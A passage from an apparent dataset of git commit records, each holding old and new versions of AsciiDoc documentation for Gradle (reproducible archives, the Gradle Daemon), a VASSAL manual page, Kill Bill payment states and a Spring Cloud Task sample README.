archive. By default, this is set based on the archive task type and the compression type (if you're creating a TAR). Will be one of: `zip`, `jar`, `war`, `tar`, `tgz` or `tbz2`. You can of course set this to a custom extension if you wish.\n\n[[sec:sharing_content_between_multiple_archives]]\n=== Sharing content between multiple archives\n\n<<#sub:sharing_copy_specs,As described earlier>>, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:copySpec(org.gradle.api.Action)[Project.copySpec(org.gradle.api.Action)] method to share content between archives.\n\n[[sec:reproducible_archives]]\n=== Reproducible builds\n\nSometimes it's desirable to recreate archives exactly the same, byte for byte, on different machines. You want to be sure that building an artifact from source code produces the same result no matter when and where it is built. This is necessary for projects like https:\/\/reproducible-builds.org\/[reproducible-builds.org].\n\nReproducing the same byte-for-byte archive poses some challenges since the order of the files in an archive is influenced by the underlying file system. Each time a ZIP, TAR, JAR, WAR or EAR is built from source, the order of the files inside the archive may change. Files that only have a different timestamp also causes differences in archives from build to build. All link:{groovyDslPath}\/org.gradle.api.tasks.bundling.AbstractArchiveTask.html[AbstractArchiveTask] (e.g. Jar, Zip) tasks shipped with Gradle include support for producing reproducible archives.\n\nFor example, to make a `Zip` task reproducible you need to set link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:reproducibleFileOrder[Zip.isReproducibleFileOrder()] to `true` and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html#org.gradle.api.tasks.bundling.Zip:preserveFileTimestamps[Zip.isPreserveFileTimestamps()] to `false`. In order to make all archive tasks in your build reproducible, consider adding the following configuration to your build file:\n\n.Activating reproducible archives\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=reproducible]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=reproducible]\"]\n====\n\nOften you will want to publish an archive, so that it is usable from another project.\nThis process is described in <<cross_project_publications.adoc#cross_project_publications,Cross-Project publications>>.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"050beefbc4f8083cc73b0ae1a9fc54e02650390b","subject":"We put the ass in as","message":"We put the ass in as\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/UsePrototype.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/UsePrototype.adoc","new_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > <<GamePiece.adoc#top,Game Piece>> > *Prototype (Trait)*#\n\n'''''\n\n=== Prototype (Trait)\n\nimage:images\/UsePrototype.png[]\n\nThe Prototype trait allows a piece to share a set of common traits with other pieces.\nThe traits themselves are defined elsewhere in a <<Prototypes.adoc#top,Prototype Definition>> in the _[Global Piece Prototype Definitions]_ section of your module.\nA Game Piece may contain any number of Prototype traits, intermixed with regular traits, in any order.\n\n*EXAMPLE:* A Prototype named _Vehicle_ can be defined with _Can Rotate_, _Text Label_, and _Mark When Moved_ traits.\nAny counter can use these traits by using a Prototype trait and specifying _Vehicle_ as the name.\nIf the module author later decides that vehicles should also have another trait, it need only be added to the Prototype definition, and all game pieces with a _Prototype - Vehicle_ trait will automatically gain the new trait.\nSimilary, modifying or deleting a trait from a Prototype will change or remove that trait for all pieces that reference the Prototype.\n\n**Prototype Name:**:: Type the name of your prototype here - the name you gave it to its <<Prototypes.adoc#top,prototype definition>>. Alternatively you can click the _Select_ button to pick the prototype from the list of all the ones you have created.\n\n**Select:**:: The _Select_ button allows you to select one of the prototypes you have defined in the module. If your prototypes have been organized into folders, the folders will appear as submenus.\n\nimage:images\/UsePrototype2.png[]\n\n*SEE ALSO:* <<Prototypes.adoc#top,Prototypes (Definition)>>\n","old_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > <<GamePiece.adoc#top,Game Piece>> > *Prototype (Trait)*#\n\n'''''\n\n=== Prototype (Trait)\n\nimage:images\/UsePrototype.png[]\n\nThe Prototype trait allows a piece to share a set of common traits with other pieces.\nThe traits themselves are defined elsewhere in a <<Prototypes.adoc#top,Prototype Definition>> in the _[Global Piece Prototype Definitions]_ section of your module.\nA Game Piece may contain any number of Prototype traits, intermixed with regular traits, in any order.\n\n*EXAMPLE:* A Prototype named _Vehicle_ can be defined with _Can Rotate_, _Text Label_, and _Mark When Moved_ traits.\nAny counter can use these traits by using a Prototype trait and specifying _Vehicle_ as the name.\nIf the module author later decides that vehicles should also have another trait, it need only be added to the Prototype definition, and all game pieces with a _Prototype - Vehicle_ trait will automatically gain the new trait.\nSimilary, modifying or deleting a trait from a Prototype will change or remove that trait for all pieces that reference the Prototype.\n\n**Prototype Name:**:: Type the name of your prototype here - the name you gave it to its <<Prototypes.adoc#top,prototype definition>>. Alternatively you can click the _Select_ button to pick the prototype from the list of all the ones you have created.\n\n**Select:**:: The _Select_ button allows you to select one of the prototypes you have defined in the module. If your prototypes have been organized into folders, the folders will appear a submenus.\n\nimage:images\/UsePrototype2.png[]\n\n*SEE ALSO:* <<Prototypes.adoc#top,Prototypes (Definition)>>\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"3b396e4e381c031f20eb7d8d462b116ad65ce2e0","subject":"payment: update payment states","message":"payment: update payment states\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/payment\/includes\/payment-overview.adoc","new_file":"userguide\/payment\/includes\/payment-overview.adoc","new_contents":"=== Payment Abstractions\n\nKill Bill has a payment subsystem which offers several APIs:\n\n* payment and refund APIs for recurring billing\n* *direct* payment APIs for one-off charges\n\nThe former set of APIs is used by the core billing engine to charge for subscriptions, and by Kaui (the Kill Bill Admin UI) to handle refunds, chargebacks, adjustments, etc. for invoices and payments associated with such subscriptions.\n\nThe latter set can be used to trigger payments (auth, capture, credit, refund, etc.) by your e-commerce application (e.g. shopping cart). It also offers helpers to create payment forms and redirect URLs in case of hosted payment pages. It is independent of any subscriptions or invoices and is used solely to make payments.\n\nKill Bill is a generic platform to build billing and payment infrastructures and as such, it is agnostic of payment gateways. However, it provides a framework to register payment plugins, which in turn implement gateway specific APIs. Those payment plugins must be OSGI compliant plugins. They can be written either in:\n\n* java; in which case they are just a standard OSGI java jar which must register a service implementing the https:\/\/github.com\/killbill\/killbill-plugin-api\/blob\/master\/payment\/src\/main\/java\/org\/killbill\/billing\/payment\/plugin\/api\/PaymentPluginApi.java[PaymentPluginApi]\n* ruby; in which case they must use the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby[killbill gem] which provides a jruby bridge between java and ruby. Those plugins must inherit the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/blob\/master\/lib\/killbill\/payment.rb[Payment class] to provide the specific plugin code functionality\n\nThe main reason to provide a way to write ruby payment plugins is to be able to reuse the http:\/\/activemerchant.org\/[Active Merchant] gem. We even have a https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/[generator] to help you generate a payment plugin from an Active Merchant implementation.\n\nCheck the wiki page https:\/\/github.com\/killbill\/killbill\/wiki\/Payment-plugins[Payment Plugins] for a community-supported list of already written payment plugins.\n\nThe Kill Bill payment code will detect all the payment plugins registered in the system and decide which plugin to use when a charge, refund, ... operation needs to happen. The dispatching is based on the payment methods associated with each account. By default, the model is to attach a default payment method to each account: that payment method will have a link that points to a specific plugin to use. For instance, one account could have a Paypal payment method that would point to the Paypal plugin. Additionally, you can also override the payment method to use on a per payment call. The figure below shows the relashionship between a Kill Bill `Account`, its various `PaymentMethods`, each of which points to a given Kill Bill plugin, which itself is in charge to interact with a third party payment gateway.\n\nimage:https:\/\/docs.google.com\/drawings\/d\/1ERbfXS0LKSyANT08wnp3zDyoROkhKWSdX2EK0LpwLQ4\/pub?w=960&h=480[align=center]\n\nBy default Kill Bill does not come configured with any payment plugins except for the built-in __EXTERNAL_PAYMENT__, which is used to track payments which occurred outside of Kill Bill. A typical example would be for when a customer pays by check and we want to make sure the invoice balance is set to 0 after receiving the check. A user, represented in Kill Bill as an account can add as many payment methods as required, and each of those will identify a specific plugin that Kill Bill will use when making payments.\n\n\n=== Payment States\n\nInitially a client of the api can make either an *authorization*, a *purchase*, or a *credit* call (all other operations such as refund would require an initial payment to have already existed).\nThat initial operation will create a https:\/\/github.com\/killbill\/killbill-api\/blob\/master\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/Payment.java[Payment] and an initial https:\/\/github.com\/killbill\/killbill-api\/blob\/c243233be112165bf04a89a715b79112c6c5d1f7\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/PaymentTransaction.java[PaymentTransaction].\nThe user can then submit additional requests for the same payment (capture, refund, ...) and each of those calls will result in additional `PaymentTransaction` attached to the same payment.\nThe payments have a state which will drive the set of possible subsequent operations available. For instance, it is possible to make a capture call against a payment in a state `AUTH_SUCCESS` but it is not possible to make such an operation against a payment in an `AUTH_ERRORED` state.\nThe set of payment state transitions are configured in an https:\/\/github.com\/killbill\/killbill\/blob\/master\/payment\/src\/main\/resources\/org\/killbill\/billing\/payment\/PaymentStates.xml[xml file] and the Kill Bill payment subsystem is in charge to enforce the transitions. The following diagram below shows all the possible transitions:\n\n\/\/ Tricky see http:\/\/lifehacker.com\/share-direct-links-to-files-in-google-drive-and-skip-th-1493813665\nimage:https:\/\/drive.google.com\/uc?&id=0Bw8rymjWckBHNnlZNTJsZ3pHMTg&w=960&h=480[align=center]\n\nIn addition to the payment state transitions, each `PaymentTransaction` has a status to reflect the result of the operation. The `PaymentTransaction` status depends on the plugin result and it can be summarized below:\n\n|===\n|plugin result | payment transaction status | payment state | description\n\n|PROCESSED\n|SUCCESS\n|{AUTH,CAPTURE,..}_SUCCESS\n|The payment transaction went through and was successful\n\n|PENDING\n|PENDING\n|{AUTH,CAPTURE,..}_PENDING\n|Successful asynchronous operation (e.g. ACH transfer) or multi-step call (e.g. 3D-Secure authorization)\n\n|ERROR\n|PAYMENT_FAILURE\n|{AUTH,CAPTURE,..}_FAILED\n|The payment transaction went through but failed (e.g insufficient funds)\n\n|CANCELED\n|PLUGIN_FAILURE\n|{AUTH,CAPTURE,..}_ERRORED\n|The payment transaction did not happen (e.g unable to connect to the provider)\n\n|UNDEFINED, timeout or any exception\n|UNKNOWN\n|{AUTH,CAPTURE,..}_ERRORED\n|The payment transaction may or not have succeeded, manual review needed\n\n|===\n\nNote that the first 3 cases are normal cases but the last 2 are errors that are unrelated to the user being able to make the payment operation:\n\n* in the case of a hard plugin failure (CANCELED result code), the gateway was probably down and the payment wasn't attempted: there is no attempt to fix those.\n* in the case of a plugin timeout (or UNDEFINED result code), the operation might actually have completed; Kill Bill will run a background task to detect those cases and will query the plugin to verify if the state is actually known and when it is, it will update the *transaction status* and move the payment to its appropriate state. If the plugin cannot tell if the payment went through, the transaction will stay in an UNKNOWN state. It is advisable to check that those are rare instances and fix the data appropriately (by checking manually the status in the gateway for example).","old_contents":"=== Payment Abstractions\n\nKill Bill has a payment subsystem which offers several APIs:\n\n* payment and refund APIs for recurring billing\n* *direct* payment APIs for one-off charges\n\nThe former set of APIs is used by the core billing engine to charge for subscriptions, and by Kaui (the Kill Bill Admin UI) to handle refunds, chargebacks, adjustments, etc. for invoices and payments associated with such subscriptions.\n\nThe latter set can be used to trigger payments (auth, capture, credit, refund, etc.) by your e-commerce application (e.g. shopping cart). It also offers helpers to create payment forms and redirect URLs in case of hosted payment pages. It is independent of any subscriptions or invoices and is used solely to make payments.\n\nKill Bill is a generic platform to build billing and payment infrastructures and as such, it is agnostic of payment gateways. However, it provides a framework to register payment plugins, which in turn implement gateway specific APIs. Those payment plugins must be OSGI compliant plugins. They can be written either in:\n\n* java; in which case they are just a standard OSGI java jar which must register a service implementing the https:\/\/github.com\/killbill\/killbill-plugin-api\/blob\/master\/payment\/src\/main\/java\/org\/killbill\/billing\/payment\/plugin\/api\/PaymentPluginApi.java[PaymentPluginApi]\n* ruby; in which case they must use the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby[killbill gem] which provides a jruby bridge between java and ruby. Those plugins must inherit the https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/blob\/master\/lib\/killbill\/payment.rb[Payment class] to provide the specific plugin code functionality\n\nThe main reason to provide a way to write ruby payment plugins is to be able to reuse the http:\/\/activemerchant.org\/[Active Merchant] gem. We even have a https:\/\/github.com\/killbill\/killbill-plugin-framework-ruby\/[generator] to help you generate a payment plugin from an Active Merchant implementation.\n\nCheck the wiki page https:\/\/github.com\/killbill\/killbill\/wiki\/Payment-plugins[Payment Plugins] for a community-supported list of already written payment plugins.\n\nThe Kill Bill payment code will detect all the payment plugins registered in the system and decide which plugin to use when a charge, refund, ... operation needs to happen. The dispatching is based on the payment methods associated with each account. By default, the model is to attach a default payment method to each account: that payment method will have a link that points to a specific plugin to use. For instance, one account could have a Paypal payment method that would point to the Paypal plugin. Additionally, you can also override the payment method to use on a per payment call. The figure below shows the relashionship between a Kill Bill `Account`, its various `PaymentMethods`, each of which points to a given Kill Bill plugin, which itself is in charge to interact with a third party payment gateway.\n\nimage:https:\/\/docs.google.com\/drawings\/d\/1ERbfXS0LKSyANT08wnp3zDyoROkhKWSdX2EK0LpwLQ4\/pub?w=960&h=480[align=center]\n\nBy default Kill Bill does not come configured with any payment plugins except for the built-in __EXTERNAL_PAYMENT__, which is used to track payments which occurred outside of Kill Bill. A typical example would be for when a customer pays by check and we want to make sure the invoice balance is set to 0 after receiving the check. A user, represented in Kill Bill as an account can add as many payment methods as required, and each of those will identify a specific plugin that Kill Bill will use when making payments.\n\n\n=== Payment States\n\nInitially a client of the api can make either an *authorization*, a *purchase*, or a *credit* call (all other operations such as refund would require an initial payment to have already existed).\nThat initial operation will create a https:\/\/github.com\/killbill\/killbill-api\/blob\/master\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/Payment.java[Payment] and an initial https:\/\/github.com\/killbill\/killbill-api\/blob\/c243233be112165bf04a89a715b79112c6c5d1f7\/src\/main\/java\/org\/killbill\/billing\/payment\/api\/PaymentTransaction.java[PaymentTransaction].\nThe user can then submit additional requests for the same payment (capture, refund, ...) and each of those calls will result in additional `PaymentTransaction` attached to the same payment.\nThe payments have a state which will drive the set of possible subsequent operations available. For instance, it is possible to make a capture call against a payment in a state `AUTH_SUCCESS` but it is not possible to make such an operation against a payment in an `AUTH_ERRORED` state.\nThe set of payment state transitions are configured in an https:\/\/github.com\/killbill\/killbill\/blob\/master\/payment\/src\/main\/resources\/org\/killbill\/billing\/payment\/PaymentStates.xml[xml file] and the Kill Bill payment subsystem is in charge to enforce the transitions. The following diagram below shows all the possible transitions:\n\n\/\/ Tricky see http:\/\/lifehacker.com\/share-direct-links-to-files-in-google-drive-and-skip-th-1493813665\nimage:https:\/\/drive.google.com\/uc?&id=0Bw8rymjWckBHNnlZNTJsZ3pHMTg&w=960&h=480[align=center]\n\nIn addition to the payment state transitions, each `PaymentTransaction` has a status to reflect the result of the operation. The `PaymentTransaction` status depends on the plugin result and it can be summarized below:\n\n|===\n|plugin result | payment transaction status | payment state | description\n\n|PROCESSED\n|SUCCESS\n|{AUTH,CAPTURE,..}_SUCCESS\n|Success operation\n\n|PENDING\n|PENDING\n|{AUTH,CAPTURE,..}_PENDING\n|Success asynchronous operation, or multi-step calls (e.g. 3D Secure authorization)\n\n|ERROR\n|PAYMENT_FAILURE\n|FAILED\n|The gateway, bank declined the operation\n\n|UNDEFINED, timeout\n|UNKNOWN\n|ERRORED\n|Plugin timed out or returned an UNDEFINED state\n\n|Any exception\n|PLUGIN_FAILURE\n|ERRORED\n|The plugin threw an exception\n\n|===\n\nNote that the first 3 cases are normal cases but the last 2 are errors that are unrelated to the user being able to make the payment operation:\n\n* in the case of a plugin timeout (or UNDEFINED result code), the operation might actually have completed; Kill Bill will run a background task to detect those cases and will query the plugin to verify if the state is actually known and when it is, it will update the *transaction status* and move the payment to its appropriate state.\n* in the case of a plugin exception, this is probably a bug (either in the plugin, the third part gateway or Kill Bill itself), and so there is no attempt to fix those. However it advisable to check that those are rare instances and fix code\/data appropriately.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eddd38797b2859a30eda624ce04ca43b0be23865","subject":"2 typos","message":"2 typos\n","repos":"trisberg\/spring-cloud-task,trisberg\/spring-cloud-task,cppwfs\/spring-cloud-task,spring-cloud\/spring-cloud-task,mminella\/spring-cloud-task,trisberg\/spring-cloud-task,mminella\/spring-cloud-task","old_file":"spring-cloud-task-samples\/partitioned-batch-job\/README.adoc","new_file":"spring-cloud-task-samples\/partitioned-batch-job\/README.adoc","new_contents":"= Partitioned Job\n\nAn example of the usage of the `DeployerPartitionHandler` and\n`DeployerStepExecutionHandler` to partition a Spring Batch job.\n\n== Requirements:\n\n* Java 7 or Above\n\n== Build:\n\n[source,shell,indent=2]\n----\n$ .\/mvnw clean install\n----\n\n== Execute:\n\n[source,shell,indent=2]\n----\n$ export spring_datasource_url=jdbc:mysql:\/\/localhost:3306\/<your database>\n$ export spring_datasource_username=<your username>\n$ export spring_datasource_password=<your password>\n$ export spring_datasource_driverClassName=org.mariadb.jdbc.Driver\n$ java -jar -Dspring.profiles.active=master target\/partitioned-batch-job-1.0.0.BUILD-SNAPSHOT.jar\n----\n\nNOTE: This example will use require a MySql RDBMS repository and currently uses the mariadb jdbc driver to connect.\nYou can changes this another driver based on your needs.\n\n== Dependencies:\n\nA datasource (not in memory) must be configured based on normal Spring Boot conventions\n(application.properties\/application.yml\/environment variables\/etc).","old_contents":"= Partitioned Job\n\nAn example of the usage of the `DeployerPartitionHandler` and\n`DeployerStepExecutionHandler` to partition a Spring Batch job.\n\n== Requirements:\n\n* Java 7 or Above\n\n== Build:\n\n[source,shell,indent=2]\n----\n$ .\/mvnw clean install\n----\n\n== Execute:\n\n[source,shell,indent=2]\n----\n$ export spring_datasource_url=jdbc:mariadb:\/\/localhost:3306\/<your databse>\n$ export spring_datasource_username=<your username>\n$ export spring_datasource_password=<your password>\n$ export spring_datasource_driverClassName=org.mariadb.jdbc.Driver\n$ java -jar -Dspring.profiles.active=master target\/partitioned-batch-job-1.0.0.BUILD-SNAPSHOT.jar\n----\n\nNOTE: This example will use require a MySql RDBMS repository and currently uses the mariadb jdbc driver to connect.\nYou can changes this another driver based on your needs.\n\n== Dependencies:\n\nA datasource (not in memory) must be configured based on normal Spring Boot conventions\n(application.properties\/application.yml\/environment variables\/etc).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec6a3b61f05f38552715f50dffd73957e673c3f6","subject":"Do not promise to fix limitations","message":"Do not promise to fix limitations\n","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/gradle_daemon.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/running-builds\/gradle_daemon.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[gradle_daemon]]\n= The Gradle Daemon\n\n[quote, Wikipedia]\nA daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.\n\nGradle runs on the Java Virtual Machine (JVM) and uses several supporting libraries that require a non-trivial initialization time. As a result, it can sometimes seem a little slow to start. The solution to this problem is the Gradle _Daemon_: a long-lived background process that executes your builds much more quickly than would otherwise be the case. We accomplish this by avoiding the expensive bootstrapping process as well as leveraging caching, by keeping data about your project in memory. Running Gradle builds with the Daemon is no different than without. Simply configure whether you want to use it or not \u2014 everything else is handled transparently by Gradle.\n\n\n[[sec:why_the_daemon]]\n== Why the Gradle Daemon is important for performance\n\nThe Daemon is a long-lived process, so not only are we able to avoid the cost of JVM startup for every build, but we are able to cache information about project structure, files, tasks, and more in memory.\n\nThe reasoning is simple: improve build speed by reusing computations from previous builds. However, the benefits are dramatic: we typically measure build times reduced by 15-75% on subsequent builds. We recommend profiling your build by using `--profile` to get a sense of how much impact the Gradle Daemon can have for you.\n\nThe Gradle Daemon is enabled by default starting with Gradle 3.0, so you don't have to do anything to benefit from it.\n\n[[sec:status]]\n== Running Daemon Status\n\nTo get a list of running Gradle Daemons and their statuses use the `--status` command.\n\nSample output:\n[source]\n----\n PID VERSION STATUS\n 28411 3.0 IDLE\n 34247 3.0 BUSY\n----\n\n\nCurrently, a given Gradle version can only connect to daemons of the same version. This means the status output will only show Daemons for the version of Gradle being invoked and not for any other versions. Future versions of Gradle will lift this constraint and will show the running Daemons for all versions of Gradle.\n\n[[sec:disabling_the_daemon]]\n== Disabling the Daemon\n\nThe Gradle Daemon is enabled by default, and we recommend always enabling it. There are several ways to disable the Daemon, but the most common one is to add the line\n\n[source]\n----\norg.gradle.daemon=false\n----\n\nto the file `\u00abUSER_HOME\u00bb\/.gradle\/gradle.properties`, where `\u00abUSER_HOME\u00bb` is your home directory. That\u2019s typically one of the following, depending on your platform:\n\n* `C:\\Users\\<username>` (Windows Vista & 7+)\n* `\/Users\/<username>` (macOS)\n* `\/home\/<username>` (Linux)\n\nIf that file doesn\u2019t exist, just create it using a text editor. You can find details of other ways to disable (and enable) the Daemon in <<#daemon_faq,Daemon FAQ>> further down. That section also contains more detailed information on how the Daemon works.\n\nNote that having the Daemon enabled, all your builds will take advantage of the speed boost, regardless of the version of Gradle a particular build uses.\n\n[TIP]\n.Continuous integration\n====\n\nSince Gradle 3.0, we enable Daemon by default and recommend using it for both developers' machines and Continuous Integration servers. However, if you suspect that Daemon makes your CI builds unstable, you can disable it to use a fresh runtime for each build since the runtime is _completely_ isolated from any previous builds.\n\n====\n\n\n[[sec:stopping_an_existing_daemon]]\n== Stopping an existing Daemon\n\nAs mentioned, the Daemon is a background process. You needn\u2019t worry about a build up of Gradle processes on your machine, though. Every Daemon monitors its memory usage compared to total system memory and will stop itself if idle when available system memory is low. If you want to explicitly stop running Daemon processes for any reason, just use the command `gradle --stop`.\n\nThis will terminate all Daemon processes that were started with the same version of Gradle used to execute the command. If you have the Java Development Kit (JDK) installed, you can easily verify that a Daemon has stopped by running the `jps` command. You\u2019ll see any running Daemons listed with the name `GradleDaemon`.\n\n[[daemon_faq]]\n== FAQ\n\n\n[[sec:ways_to_disable_gradle_daemon]]\n=== How do I disable the Gradle Daemon?\n\nThere are two recommended ways to disable the Daemon persistently for an environment:\n\n* Via environment variables: add the flag `-Dorg.gradle.daemon=false` to the `GRADLE_OPTS` environment variable\n* Via properties file: add `org.gradle.daemon=false` to the `\u00abGRADLE_USER_HOME\u00bb\/gradle.properties` file\n\n[NOTE]\n====\n\nNote, `\u00abGRADLE_USER_HOME\u00bb` defaults to `\u00abUSER_HOME\u00bb\/.gradle`, where `\u00abUSER_HOME\u00bb` is the home directory of the current user. This location can be configured via the `-g` and `--gradle-user-home` command line switches, as well as by the `GRADLE_USER_HOME` environment variable and `org.gradle.user.home` JVM system property.\n\n====\n\nBoth approaches have the same effect. Which one to use is up to personal preference. Most Gradle users choose the second option and add the entry to the user `gradle.properties` file.\n\nOn Windows, this command will disable the Daemon for the current user:\n\n[source]\n----\n(if not exist \"%USERPROFILE%\/.gradle\" mkdir \"%USERPROFILE%\/.gradle\") && (echo. >> \"%USERPROFILE%\/.gradle\/gradle.properties\" && echo org.gradle.daemon=false >> \"%USERPROFILE%\/.gradle\/gradle.properties\")\n----\n\nOn UNIX-like operating systems, the following Bash shell command will disable the Daemon for the current user:\n\n[source,bash]\n----\nmkdir -p ~\/.gradle && echo \"org.gradle.daemon=false\" >> ~\/.gradle\/gradle.properties\n----\n\nOnce the Daemon is disabled for a build environment in this way, a Gradle Daemon will not be started unless explicitly requested using the `--daemon` option.\n\nThe `--daemon` and `--no-daemon` command line options enable and disable usage of the Daemon for individual build invocations when using the Gradle command line interface. These command line options have the _highest_ precedence when considering the build environment. Typically, it is more convenient to enable the Daemon for an environment (e.g. a user account) so that all builds use the Daemon without requiring to remember to supply the `--daemon` option.\n\n[[sec:why_is_there_more_than_one_daemon_process_on_my_machine]]\n=== Why is there more than one Daemon process on my machine?\n\nThere are several reasons why Gradle will create a new Daemon, instead of using one that is already running. The basic rule is that Gradle will start a new Daemon if there are no existing idle or compatible Daemons available. Gradle will kill any Daemon that has been idle for 3 hours or more, so you don't have to worry about cleaning them up manually.\n\nidle::\nAn idle Daemon is one that is not currently executing a build or doing other useful work.\ncompatible::\nA compatible Daemon is one that can (or can be made to) meet the requirements of the requested build environment. The Java runtime used to execute the build is an example aspect of the build environment. Another example is the set of JVM system properties required by the build runtime.\n\n\nSome aspects of the requested build environment may not be met by an Daemon. If the Daemon is running with a Java 8 runtime, but the requested environment calls for Java 10, then the Daemon is not compatible and another must be started. Moreover, certain properties of a Java runtime cannot be changed once the JVM has started. For example, it is not possible to change the memory allocation (e.g. `-Xmx1024m`), default text encoding, default locale, etc of a running JVM.\n\nThe \u201crequested build environment\u201d is typically constructed implicitly from aspects of the build client\u2019s (e.g. Gradle command line client, IDE etc.) environment and explicitly via command line switches and settings. See <<build_environment.adoc#build_environment,Build Environment>> for details on how to specify and control the build environment.\n\nThe following JVM system properties are effectively immutable. If the requested build environment requires any of these properties, with a different value than a Daemon\u2019s JVM has for this property, the Daemon is not compatible.\n\n* file.encoding\n* user.language\n* user.country\n* user.variant\n* java.io.tmpdir\n* javax.net.ssl.keyStore\n* javax.net.ssl.keyStorePassword\n* javax.net.ssl.keyStoreType\n* javax.net.ssl.trustStore\n* javax.net.ssl.trustStorePassword\n* javax.net.ssl.trustStoreType\n* com.sun.management.jmxremote\n\nThe following JVM attributes, controlled by startup arguments, are also effectively immutable. The corresponding attributes of the requested build environment and the Daemon\u2019s environment must match exactly in order for a Daemon to be compatible.\n\n* The maximum heap size (i.e. the -Xmx JVM argument)\n* The minimum heap size (i.e. the -Xms JVM argument)\n* The boot classpath (i.e. the -Xbootclasspath argument)\n* The \u201cassertion\u201d status (i.e. the -ea argument)\n\nThe required Gradle version is another aspect of the requested build environment. Daemon processes are coupled to a specific Gradle runtime. Working on multiple Gradle projects during a session that use different Gradle versions is a common reason for having more than one running Daemon process.\n\n[[sec:how_much_memory_does_the_daemon_use_and_can_i_give_it_more]]\n=== How much memory does the Daemon use and can I give it more?\n\nIf the requested build environment does not specify a maximum heap size, the Daemon will use up to 512MB of heap. It will use the JVM's default minimum heap size. 512MB is more than enough for most builds. Larger builds with hundreds of subprojects, lots of configuration, and source code may require, or perform better, with more memory.\n\nTo increase the amount of memory the Daemon can use, specify the appropriate flags as part of the requested build environment. Please see <<build_environment.adoc#build_environment,Build Environment>> for details.\n\n[[sec:how_can_i_stop_a_daemon]]\n=== How can I stop a Daemon?\n\nDaemon processes will automatically terminate themselves after 3 hours of inactivity or less. If you wish to stop a Daemon process before this, you can either kill the process via your operating system or run the `gradle --stop` command. The `--stop` switch causes Gradle to request that _all_ running Daemon processes, _of the same Gradle version used to run the command_, terminate themselves.\n\n[[sec:what_can_go_wrong_with_daemon]]\n=== What can go wrong with Daemon?\n\nConsiderable engineering effort has gone into making the Daemon robust, transparent and unobtrusive during day to day development. However, Daemon processes can occasionally be corrupted or exhausted. A Gradle build executes arbitrary code from multiple sources. While Gradle itself is designed for and heavily tested with the Daemon, user build scripts and third party plugins can destabilize the Daemon process through defects such as memory leaks or global state corruption.\n\nIt is also possible to destabilize the Daemon (and build environment in general) by running builds that do not release resources correctly. This is a particularly poignant problem when using Microsoft Windows as it is less forgiving of programs that fail to close files after reading or writing.\n\nGradle actively monitors heap usage and attempts to detect when a leak is starting to exhaust the available heap space in the daemon. When it detects a problem, the Gradle daemon will finish the currently running build and proactively restart the daemon on the next build. This monitoring is enabled by default, but can be disabled by setting the `org.gradle.daemon.performance.enable-monitoring` system property to false.\n\nIf it is suspected that the Daemon process has become unstable, it can simply be killed. Recall that the `--no-daemon` switch can be specified for a build to prevent use of the Daemon. This can be useful to diagnose whether or not the Daemon is actually the culprit of a problem.\n\n[[sec:tools_and_ides]]\n== Tools & IDEs\n\nThe <<third_party_integration.adoc#embedding,Gradle Tooling API>> that is used by IDEs and other tools to integrate with Gradle _always_ uses the Gradle Daemon to execute builds. If you are executing Gradle builds from within your IDE you are using the Gradle Daemon and do not need to enable it for your environment.\n\n[[sec:how_does_the_gradle_daemon_make_builds_faster]]\n== How does the Gradle Daemon make builds faster?\n\nThe Gradle Daemon is a _long lived_ build process. In between builds it waits idly for the next build. This has the obvious benefit of only requiring Gradle to be loaded into memory once for multiple builds, as opposed to once for each build. This in itself is a significant performance optimization, but that's not where it stops.\n\nA significant part of the story for modern JVM performance is runtime code optimization. For example, HotSpot (the 